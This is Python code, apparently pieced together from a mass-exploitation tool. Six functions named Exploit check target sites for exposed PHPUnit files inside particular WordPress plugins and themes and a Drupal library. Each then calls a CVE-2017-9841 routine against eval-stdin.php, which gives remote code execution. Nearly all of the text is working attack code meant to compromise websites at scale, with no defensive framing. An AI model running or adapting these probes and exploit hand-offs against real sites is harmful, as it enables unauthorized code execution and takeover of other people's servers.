def Exploit(site):
try:
vv = site + '/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/build.xml'
Exp = '/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
if 'taskname="phpunit"' in str(CheckVuln.content):
return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'dzs-videogallery', 'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit dzs-videogallery', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit dzs-videogallery', 'Wordpress')
def Exploit(site):
try:
vv = site + '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/build.xml'
Exp = '/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers)
if 'taskname="phpunit"' in str(CheckVuln.content):
return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'mailchimp', 'Drupal')
else:
return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mailchimp', 'Drupal')
except:
return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit mailchimp', 'Drupal')
def Exploit(site):
try:
vv = site + '/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/build.xml'
Exp = '/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
CheckVuln = requests.get('http://{}'.format(vv),
timeout=10,
headers=Headers)
if 'taskname="phpunit"' in str(CheckVuln.content):
return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'enfold-child',
'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2017-9841',
'PHPUnit enfold-child', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2017-9841',
'PHPUnit enfold-child', 'Wordpress')
def Exploit(site):
try:
vv = site + '/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/build.xml'
Exp = '/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
CheckVuln = requests.get('http://{}'.format(vv),
timeout=10,
headers=Headers)
if 'taskname="phpunit"' in str(CheckVuln.content):
return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'realia',
'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2017-9841',
'PHPUnit realia', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit realia',
'Wordpress')
def Exploit(site):
try:
vv = site + '/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/build.xml'
Exp = '/wp-content/plugins/contabileads/integracoes/mautic/api-library/' \
'vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
CheckVuln = requests.get('http://{}'.format(vv),
timeout=10,
headers=Headers)
if 'taskname="phpunit"' in str(CheckVuln.content):
return CVE_2017_9841PHPUnit.Exploit(site, Exp, 'contabileads',
'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2017-9841',
'PHPUnit contabileads', 'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2017-9841',
'PHPUnit contabileads', 'Wordpress')
def Exploit(site):
try:
vv = site + '/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/build.xml'
Exp = '/wp-content/plugins/woocommerce-software-license-manager/vendor/' \
'phpunit/phpunit/src/Util/PHP/eval-stdin.php'
CheckVuln = requests.get('http://{}'.format(vv),
timeout=10,
headers=Headers)
if 'taskname="phpunit"' in str(CheckVuln.content):
return CVE_2017_9841PHPUnit.Exploit(site, Exp,
'woocommerce-software',
'Wordpress')
else:
return printModule.returnNo(site, 'CVE-2017-9841',
'PHPUnit woocommerce-software',
'Wordpress')
except:
return printModule.returnNo(site, 'CVE-2017-9841',
'PHPUnit woocommerce-software',
'Wordpress')